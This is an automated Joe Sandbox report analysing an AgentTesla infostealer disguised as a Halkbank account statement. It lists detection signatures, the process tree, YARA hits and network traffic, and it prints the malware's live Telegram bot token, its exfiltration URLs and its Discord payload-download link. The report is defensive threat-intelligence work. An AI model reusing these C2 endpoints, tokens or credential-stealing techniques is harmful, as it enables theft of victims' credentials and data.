Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Halkbank_Ekstre_20220513_082357_541079.exe

Overview

General Information

Sample Name:Halkbank_Ekstre_20220513_082357_541079.exe
Analysis ID:626599
MD5:bef71f070519aad800bf09d7d5a7659b
SHA1:2d276da3aefc56f4fa91cfaaf7e766f48f1d6140
SHA256:969bf771ed84b11bc61cff977691a938687d043ca13b851efa7a627ef58b90b0
Tags:AgentTeslaexegeoHalkbankTUR
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected MSILDownloaderGeneric
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Halkbank_Ekstre_20220513_082357_541079.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe" MD5: BEF71F070519AAD800BF09D7D5A7659B)
    • cmd.exe (PID: 5068 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 1760 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • InstallUtil.exe (PID: 1028 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • Ffnbziuo.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe" MD5: BEF71F070519AAD800BF09D7D5A7659B)
    • cmd.exe (PID: 3356 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5816 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • Ffnbziuo.exe (PID: 4568 cmdline: "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe" MD5: BEF71F070519AAD800BF09D7D5A7659B)
    • cmd.exe (PID: 1000 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6180 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "5388276304", "Chat URL": "https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument"}
SourceRuleDescriptionAuthorStrings
Halkbank_Ekstre_20220513_082357_541079.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x133f:$x1: https://cdn.discordapp.com/attachments/
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x133f:$x1: https://cdn.discordapp.com/attachments/
SourceRuleDescriptionAuthorStrings
00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 30 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x30e23:$s10: logins
                • 0x3088a:$s11: credential
                • 0x2cd97:$g1: get_Clipboard
                • 0x2cda5:$g2: get_Keyboard
                • 0x2cdb2:$g3: get_Password
                • 0x2e0d1:$g4: get_CtrlKeyDown
                • 0x2e0e1:$g5: get_ShiftKeyDown
                • 0x2e0f2:$g6: get_AltKeyDown
                15.0.InstallUtil.exe.400000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  15.0.InstallUtil.exe.400000.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 59 entries
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 15.0.InstallUtil.exe.400000.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5388276304", "Chat URL": "https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument"}
                    Source: InstallUtil.exe.1028.15.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendMessage"}
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeVirustotal: Detection: 34%Perma Link
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeReversingLabs: Detection: 39%
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeReversingLabs: Detection: 39%
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeJoe Sandbox ML: detected
                    Source: 15.0.InstallUtil.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 15.0.InstallUtil.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                    Source: 15.0.InstallUtil.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                    Source: 15.0.InstallUtil.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                    Source: 15.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 15.0.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49749 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49774 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49779 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49781 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49785 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49789 version: TLS 1.2
                    Source: Halkbank_Ekstre_20220513_082357_541079.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: protobuf-net.pdbSHA256 source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 4x nop then jmp 06486E90h
                    Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                    Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exeCode function: 4x nop then jmp 055B6E90h

                    Networking

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20220513_082357_541079.exe PID: 6424, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Ffnbziuo.exe PID: 4600, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Ffnbziuo.exe PID: 4568, type: MEMORYSTR
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bfc9e9f2a6Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35c0aab288a2Host: api.telegram.orgContent-Length: 1895Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bce6fc6661Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bce7a34abcHost: api.telegram.orgContent-Length: 1895Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bceb536d8fHost: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bceb87e14bHost: api.telegram.orgContent-Length: 1895Expect: 100-continue
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
                    Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                    Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: InstallUtil.exe, 0000000F.00000002.532228765.0000000003548000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532614975.0000000003581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: InstallUtil.exe, 0000000F.00000002.539231225.00000000065BA000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000003.491091731.0000000000FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://qguwMz.com
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.389756600.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.529463502.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Ffnbziuo.exe, 00000011.00000002.529534251.00000000022CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                    Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                    Source: InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/
                    Source: InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument
                    Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocumentdocument-----
                    Source: InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4dk
                    Source: InstallUtil.exe, 0000000F.00000002.532614975.0000000003581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD8dkh
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.389756600.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.529463502.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                    Source: Ffnbziuo.exe, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, Ffnbziuo.exe.0.drString found in binary or memory: https://cdn.discordapp.com/attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp/Xcf
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: InstallUtil.exe, 0000000F.00000002.532077311.000000000352B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.531824600.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532228765.0000000003548000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rBRWiNLNwm.com
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
